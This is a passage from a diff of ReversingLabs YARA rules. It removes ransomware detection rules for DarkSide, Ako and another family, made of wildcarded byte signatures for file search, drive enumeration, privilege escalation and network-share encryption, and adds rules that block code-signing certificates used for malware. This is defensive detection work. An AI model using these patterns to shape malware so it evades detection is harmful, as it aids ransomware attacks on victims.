-            68 ?? ?? ?? ?? 8D 96 ?? ?? ?? ?? 52 FF 36 E8 ?? ?? ?? ?? 5A 48 0F 85 ?? ?? ?? ?? 33
-            C0 3B C2 73 ?? 80 BC 06 ?? ?? ?? ?? ?? 74 ?? 40 EB ?? 6A ?? 6A ?? 2B C2 50 FF 36 E8
-            ?? ?? ?? ?? 40 74 ?? FF 36 E8 ?? ?? ?? ?? 48 75 ?? EB ?? C7 46 ?? ?? ?? ?? ?? 81 7E
-            ?? ?? ?? ?? ?? 74 ?? 6A ?? EB ?? 6A ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 06 81 7E ??
-            ?? ?? ?? ?? 74 ?? FF 36 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 F8 ?? 75 ?? C7 46 ?? ?? ?? ??
-            ?? 33 C0 5E C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $search_config_file ) and ( all of ( $find_files_p* ) ) and ( $track_mouse_event_for_entropy ) and ( $encrypt_files ) and ( all of ( $show_ransom_note_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DVERI FADO, TOV" and pe.signatures [ i ] . serial == "25:3a:d2:5e:39:ab:e8:f8:fd:a9:fc:f6" and 1538662130 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Darkside : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_A9C1523Cb2C73A82771D318124963E87 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects DarkSide ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "061b00cb-9b70-521f-ab3f-7e6b3c129194"
-		date = "2021-05-17"
-		modified = "2021-05-17"
+		id = "b21365d0-eaff-51da-8b8e-6a6ee75a5b95"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.DarkSide.yara#L1-L94"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13818-L13836"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "128af9a1b143e4b0928dd2b243e69497be906175f44815cc5703f17cce48ec9d"
+		logic_hash = "87e314d14361f56935b7a8fb93468cfaf2c73e16c25d68a61ec80ad9334d3115"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "DarkSide"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_v1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 04 45 ?? ?? ??
-            ?? 50 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ??
-            ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 8D 85 ??
-            ?? ?? ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8D 9D ?? ??
-            ?? ?? 83 3B ?? 74 ?? 81 3B ?? ?? ?? ?? 74 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8D 85 ?? ??
-            ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 7D ??
-            ?? 74 ?? FF 75 ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5A 59 5B
-            8B E5 5D C2
-        }
-		$enumerate_drives = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 8B D8 85 DB 74 ?? C1 EB ?? 8D B5 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 F8
-            ?? 74 ?? 83 F8 ?? 75 ?? 56 E8 ?? ?? ?? ?? 8D 76 ?? 4B 85 DB 75 ?? 5F 5E 5A 59 5B 8B
-            E5 5D C3 55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? C7
-            00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4
-            ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 66 A9 ?? ?? 74 ?? 6A ?? 8D 85 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 40 ?? 50 FF 15 ?? ?? ??
-            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15
-            ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C2
-        }
-		$escalate_privileges = {
-            55 8B EC 83 C4 ?? 53 51 52 56 57 8D 45 ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F
-            85 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75
-            ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 50
-            FF 75 ?? FF 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 ?? AD 8B F8 83
-            7E ?? ?? 74 ?? C7 46 ?? ?? ?? ?? ?? 83 C6 ?? 4F 85 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 75
-            ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C3
-        }
-		$enumerate_netshare = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 7D ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 6A ??
-            8D 45 ?? 50 6A ?? 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 ?? 83 7E ?? ?? 75 ?? 68 ??
-            ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 C7 03 ?? ?? ?? ?? C7 43 ??
-            ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 8D 47 ?? 50 53 FF 15 ?? ?? ??
-            ?? 83 C4 ?? 53 FF 15 ?? ?? ?? ?? FF 36 53 FF 15 ?? ?? ?? ?? 83 C4 ?? 53 E8 ?? ?? ??
-            ?? 53 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C6 ?? FF 4D ?? 83 7D ?? ?? 75 ??
-            FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C2
-        }
-		$find_files_v2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D BD
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ??
-            83 C4 ?? 66 83 7C 47 ?? ?? 74 ?? 66 C7 04 47 ?? ?? 83 C7 ?? C7 04 47 ?? ?? ?? ?? C7
-            44 47 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 66 A9 ?? ?? 74 ??
-            8D 9D ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 83 C4
-            ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 83 C0 ?? 53 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 56
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ??
-            FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $find_files_v1 and $enumerate_drives and $escalate_privileges ) or ( $find_files_v2 and $enumerate_netshare ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ULTERA" and ( pe.signatures [ i ] . serial == "00:a9:c1:52:3c:b2:c7:3a:82:77:1d:31:81:24:96:3e:87" or pe.signatures [ i ] . serial == "a9:c1:52:3c:b2:c7:3a:82:77:1d:31:81:24:96:3e:87" ) and 1499731200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Ako : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_68E1B2C210B19Bb1F2A24176709B165B : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Ako ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fce98a6a-f7bd-52ee-a2b8-31b48f6134ca"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "e17bf185-3dfc-5a2f-a87f-525ac0e4084b"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Ako.yara#L1-L173"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13838-L13854"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8321a4ace66ae48e3a6896daf02c184fa7767fa6bd10cd83b322ad01698008cf"
+		logic_hash = "8e88ad992c58d37ff1ac34e2d9cf121f3bc692ae78c0ad79140974abdec2f317"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Ako"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_win64_p1 = {
-            44 89 4C 24 ?? 4C 89 44 24 ?? 48 89 54 24 ?? 48 89 4C 24 ?? 56 57 48 81 EC ?? ?? ??
-            ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? ?? ??
-            48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 48 83 BC 24 ?? ?? ?? ?? ?? 75 ?? 32 C0 E9 ?? ?? ??
-            ?? 41 B9 ?? ?? ?? ?? 45 33 C0 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 90 89 44 24 ?? 81 7C 24 ?? ?? ?? ?? ?? 73 ?? 32 C0 E9 ?? ?? ?? ?? C7 84 24
-            ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA
-            48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? 32
-            C0 E9 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24
-            ?? 45 33 C0 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 45 33 C0 BA ?? ?? ?? ??
-            48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 84
-            24 ?? ?? ?? ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
-            48 8D 84 24 ?? ?? ?? ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA 48 C7 44 24 ?? ?? ?? ??
-            ?? EB ?? 48 8B 44 24 ?? 48 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48
-            39 44 24 ?? 0F 8D ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ??
-            4C 8D 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 90 85 C0 75 ?? C6 44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? E9 ?? ?? ?? ?? 33 D2 48 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 41
-            B8 ?? ?? ?? ?? 48 8B D0 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? C6
-        }
-		$encrypt_files_win64_p2 = {
-            44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 90 0F B6 44 24 ?? E9 ?? ?? ?? ?? 45 33 C9 4C 8D 84 24 ?? ?? ?? ?? 48 8B 94
-            24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? C6 44 24 ??
-            ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            90 0F B6 44 24 ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8B 44 24 ?? 05 ?? ??
-            ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 39 44 24 ?? 0F 83 ?? ?? ?? ?? 48 8D 8C 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 90 8B 4C 24 ?? 48 03 C1 48 89 44 24 ?? 33 D2 48 8D 8C 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B F8 48 8B 44 24 ?? 48 8B F0 B9 ?? ?? ?? ?? F3 A4 48
-            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 8B 4C 24 ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ??
-            ?? 4C 8B C8 45 33 C0 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            90 0F B6 C0 85 C0 75 ?? C6 44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48
-            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? E9 ?? ?? ?? ?? 48 8D 8C 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 90 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 4C 24 ?? 44 8B 44 24 ??
-            48 8B D0 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? C6 44 24 ?? ?? 48
-            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F
-            B6 44 24 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 75 ?? EB ?? E9 ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 44 24 ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA
-        }
-		$encrypt_files_win64_p3 = {
-            48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 44 24 ?? 48 8B
-            F8 33 C0 B9 ?? ?? ?? ?? F3 AA 48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? 41 B9 ?? ?? ??
-            ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 90 85 C0 0F 84 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 83 C0 ?? 48 8B C8 E8
-            ?? ?? ?? ?? 90 48 89 44 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 83 C1 ?? E8 ?? ?? ?? ?? 90
-            48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 4C 24 ?? 48 8B 4C 24 ?? 44 8B C1 48 8B D0 48 8B 8C
-            24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 48 89 44 24
-            ?? 48 8B 8C 24 ?? ?? ?? ?? 48 83 C1 ?? E8 ?? ?? ?? ?? 90 48 8B 4C 24 ?? 48 3B C8 0F
-            85 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 8B
-            84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 4C 24 ?? 41
-            B8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90
-            85 C0 74 ?? 8B 44 24 ?? 48 83 F8 ?? 75 ?? C6 44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? EB ?? C6 44
-            24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 90 0F B6 44 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 90 48 81 C4
-            ?? ?? ?? ?? 5F 5E C3
-        }
-		$encrypt_network_shares_win64_p1 = {
-            48 89 54 24 ?? 48 89 4C 24 ?? 48 81 EC ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8B
-            05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 84 24 ?? ?? ?? ?? 48 05 ?? ?? ?? ?? 48 8B C8 E8
-            ?? ?? ?? ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48
-            8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 83
-            C0 ?? 48 8D 94 24 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 90 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C
-            8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B D0 48 8D
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D 84 24 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48
-            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B
-        }
-		$encrypt_network_shares_win64_p2 = {
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            90 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ??
-            ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 90 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ??
-            ?? 48 C7 44 24 ?? ?? ?? ?? ?? EB ?? 48 8B 44 24 ?? 48 FF C0 48 89 44 24 ?? 48 8D 8C
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 39 44 24 ?? 73 ?? 48 83 7C 24 ?? ?? 76 ?? 33 D2
-            48 8B 44 24 ?? B9 ?? ?? ?? ?? 48 F7 F1 48 8B C2 48 85 C0 75 ?? 41 B9 ?? ?? ?? ?? 4C
-        }
-		$encrypt_network_shares_win64_p3 = {
-            8D 05 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 44
-            24 ?? 48 FF C0 48 89 44 24 ?? EB ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ??
-            ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 54 24 ?? 48 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ??
-            48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 90 48 8B C8 E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ??
-            E8 ?? ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ??
-            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B C8 E8 ?? ?? ?? ?? 90 4C 8B
-            C0 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 C6 44 24 ?? ?? 48 8D 8C 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? EB ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            90 32 C0 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ?? ?? C3
-        }
-		$find_files_win64 = {
-            48 89 5C 24 ?? 55 56 57 41 56 41 57 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33
